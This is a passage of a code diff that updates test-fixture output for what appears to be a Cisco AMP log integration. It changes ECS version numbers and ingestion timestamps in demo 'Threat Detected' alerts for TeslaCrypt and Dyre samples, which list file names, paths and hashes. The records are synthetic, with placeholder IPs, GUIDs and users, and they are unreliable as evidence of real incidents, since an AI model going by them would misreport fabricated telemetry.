d45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -1336,7 +1336,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -1362,7 +1362,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581755886Z", + "ingested": "2021-09-13T18:06:53.271921422Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":69000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196240\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -1419,7 +1419,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -1441,7 +1441,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581757773Z", + "ingested": "2021-09-13T18:06:53.271923288Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259080131183000,\"timestamp\":1610705857,\"timestamp_nanoseconds\":996000000,\"date\":\"2021-01-15T10:17:37+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259080131182683\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -1498,7 +1498,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -1524,7 +1524,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581759663Z", + "ingested": "2021-09-13T18:06:53.271925171Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251507855229000,\"timestamp\":1610705857,\"timestamp_nanoseconds\":944000000,\"date\":\"2021-01-15T10:17:37+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251507855228943\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -1581,7 +1581,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -1607,7 +1607,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581761565Z", + "ingested": "2021-09-13T18:06:53.271927056Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251507855229000,\"timestamp\":1610705857,\"timestamp_nanoseconds\":8000000,\"date\":\"2021-01-15T10:17:37+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261641\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -1664,7 +1664,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -1690,7 +1690,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581763451Z", + "ingested": "2021-09-13T18:06:53.271928939Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":821000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261640\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -1756,7 +1756,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -1788,7 +1788,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581765334Z", + "ingested": "2021-09-13T18:06:53.271930862Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261639\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":2712,\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}}", "kind": "alert", "action": "Threat 
Detected", @@ -1849,7 +1849,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1875,7 +1875,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581767207Z", + "ingested": "2021-09-13T18:06:53.271932733Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261638\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -1941,7 +1941,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -1973,7 +1973,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581769170Z", + "ingested": "2021-09-13T18:06:53.271934727Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":680000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261637\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":2712,\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}}", "kind": "alert", "action": "Threat 
Detected", @@ -2034,7 +2034,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -2060,7 +2060,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581771127Z", + "ingested": "2021-09-13T18:06:53.271936572Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":665000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261636\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -2126,7 +2126,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -2158,7 +2158,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581773027Z", + "ingested": "2021-09-13T18:06:53.271938451Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":509000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261635\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":3164,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\",\"sha1\":\"cea0890d4b99bae3f635a16dae71f69d137027b9\",\"md5\":\"8b88ebbb05a0e56b7dcc708498c02b3e\"}}}}}", "kind": "alert", "action": "Threat Detected", 
@@ -2219,7 +2219,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -2241,7 +2241,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581774895Z", + "ingested": "2021-09-13T18:06:53.271940356Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259028591575000,\"timestamp\":1610705845,\"timestamp_nanoseconds\":984000000,\"date\":\"2021-01-15T10:17:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259028591575130\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -2307,7 +2307,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -2339,7 +2339,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581776799Z", + "ingested": "2021-09-13T18:06:53.271942249Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251439135752000,\"timestamp\":1610705841,\"timestamp_nanoseconds\":455000000,\"date\":\"2021-01-15T10:17:21+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251439135752194\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":3164,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\",\"sha1\":\"cea0890d4b99bae3f635a16dae71f69d137027b9\",\"md5\":\"8b88ebbb05a0e56b7dcc708498c02b3e\"}}}}}", "kind": "alert", "action": "Threat Detected", 
@@ -2400,7 +2400,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -2422,7 +2422,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581778666Z", + "ingested": "2021-09-13T18:06:53.271944235Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258981346935000,\"timestamp\":1610705834,\"timestamp_nanoseconds\":346000000,\"date\":\"2021-01-15T10:17:14+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258981346934873\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -2479,7 +2479,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -2501,7 +2501,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581780563Z", + "ingested": "2021-09-13T18:06:53.271946131Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258929807327000,\"timestamp\":1610705822,\"timestamp_nanoseconds\":334000000,\"date\":\"2021-01-15T10:17:02+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258929807327320\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -2558,7 +2558,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
